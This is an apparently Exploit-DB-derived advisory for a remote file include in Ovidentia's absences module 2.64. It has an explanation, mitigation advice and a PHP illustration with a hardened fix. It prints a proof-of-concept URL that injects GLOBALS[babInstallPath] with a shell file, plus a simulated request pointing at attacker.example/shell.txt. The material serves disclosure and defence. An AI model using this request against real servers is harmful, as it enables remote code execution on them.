Vendor: Module absences
By: bd0rk
CVSS: 7.5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: Module absences
Affected Version From: 2.64
Affected Version To: 2.64
Patch Exists: NO
Related CWE: N/A
CPE: ovidentia:module:absences
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu-Linux
Ovidentia Module absences 2.64 Remote File Include Vulnerability

planning.php builds an include path from $GLOBALS['babInstallPath'] without declaring that variable itself (line 26: require_once $GLOBALS['babInstallPath'].'utilit/defines.php';). The script expects the code that normally includes it to have set the variable, but it can also be requested directly. On a PHP configuration with register_globals enabled, the request parameter GLOBALS[babInstallPath] (or, because planning.php runs at global scope, simply babInstallPath) populates the variable, so the attacker controls the path handed to require_once. With allow_url_include (PHP 5.2 and later) or allow_url_fopen (older PHP) enabled, that path can be a URL, and the server fetches and executes PHP code from an attacker-controlled host. The trailing '?' in the proof-of-concept URL turns the appended 'utilit/defines.php' into a query string that the attacker's web server ignores.

Mitigation:

Do not trust a global that can originate from the request: set babInstallPath inside the module, or refuse to run unless the Ovidentia core has loaded the script, and never let request data reach an include or require statement. At the platform level, running PHP with register_globals=Off and allow_url_include=Off removes this attack path even without a code fix, since the undeclared variable then stays empty and no remote path can be included.
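The following is an added illustration, not code from the Ovidentia project or from the advisory author. It models what register_globals did to the proof-of-concept request, shows the vulnerable include path from planning.php line 26 as a function that returns the path instead of requiring it, and gives a hardened variant. The guard constant BAB_CORE_LOADED, the host attacker.example and the directory layout are assumptions made for the example.

```php
<?php
// Added illustration, not code from Ovidentia or from the advisory author.
// Models the include-path takeover in planning.php line 26 and one way to
// harden it. BAB_CORE_LOADED, attacker.example and the paths are assumed.

// register_globals=On turned every request parameter into a global variable;
// PHP versions before the fix in 4.4.1/5.0.5 also accepted GLOBALS[...] keys.
// Simulated with parse_str() so this runs on any current PHP.
function request_globals(string $queryString): array
{
    parse_str($queryString, $vars);
    if (isset($vars['GLOBALS']) && is_array($vars['GLOBALS'])) {
        // In global scope $GLOBALS['x'] and $x are the same variable, so
        // GLOBALS[babInstallPath]=... and babInstallPath=... land in one place.
        $vars = array_merge($vars, $vars['GLOBALS']);
        unset($vars['GLOBALS']);
    }
    return $vars;
}

// The vulnerable pattern: an include path built from a variable the module
// never set itself. Returns the path instead of requiring it.
function vulnerablePath(array $globals): string
{
    return $globals['babInstallPath'] . 'utilit/defines.php';
}

// Hardened pattern, two independent checks:
//  1. a constant only the Ovidentia core defines (assumed name). define()
//     cannot be reached through register_globals, so a direct request
//     cannot fake it, unlike isset($GLOBALS['babInstallPath']);
//  2. the resolved directory must stay below the installation root, which
//     also rejects http:// and ftp:// values because realpath() returns
//     false for stream wrappers and non-existent paths.
function safePath(array $globals, string $installRoot): string
{
    if (!defined('BAB_CORE_LOADED')) {
        throw new RuntimeException('planning.php must be loaded through the Ovidentia core');
    }
    $candidate = $globals['babInstallPath'] ?? null;
    if (!is_string($candidate) || $candidate === '') {
        throw new RuntimeException('babInstallPath is not set');
    }
    $root = realpath($installRoot);
    $base = realpath($candidate);
    if ($root === false || $base === false
        || strncmp($base . DIRECTORY_SEPARATOR, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('babInstallPath is outside the installation root');
    }
    return $base . DIRECTORY_SEPARATOR . 'utilit' . DIRECTORY_SEPARATOR . 'defines.php';
}

// The advisory's request with a constructed attacker host.
$attack = request_globals('GLOBALS[babInstallPath]=http://attacker.example/shell.txt?');
echo 'vulnerable: ', vulnerablePath($attack), PHP_EOL;
// The trailing '?' makes the appended utilit/defines.php a query string the
// attacker's server ignores, so PHP fetches and executes shell.txt.

// Direct request against the hardened code: no core constant, refused.
try {
    safePath($attack, __DIR__);
} catch (RuntimeException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// Loaded through the core but with the injected URL: still refused.
define('BAB_CORE_LOADED', true);
try {
    safePath($attack, __DIR__);
} catch (RuntimeException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// The legitimate case: the core set babInstallPath to the install directory.
echo 'allowed: ', safePath(['babInstallPath' => __DIR__ . '/'], __DIR__), PHP_EOL;
```

The point of the constant check is that isset() on the global is not a guard: under register_globals the attacker supplies the variable, so it is set. A define() made by the core is the cheapest thing the request cannot forge; the realpath() containment check is the second line of defence if the variable is ever derived from configuration or request data again.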

Exploit-DB raw data:

# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880


Proof-of-Concept:

/absences-2-64/programs/planning.php line 26
---------------------------------------------------------------

require_once $GLOBALS['babInstallPath'].'utilit/defines.php';

---------------------------------------------------------------

[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt?


Description: The $GLOBALS['babInstallPath'] parameter isn't declared before require_once,
             so an attacker can use this to execute PHP shellcode, for example.


### The 27-year-old German hacker bd0rk ###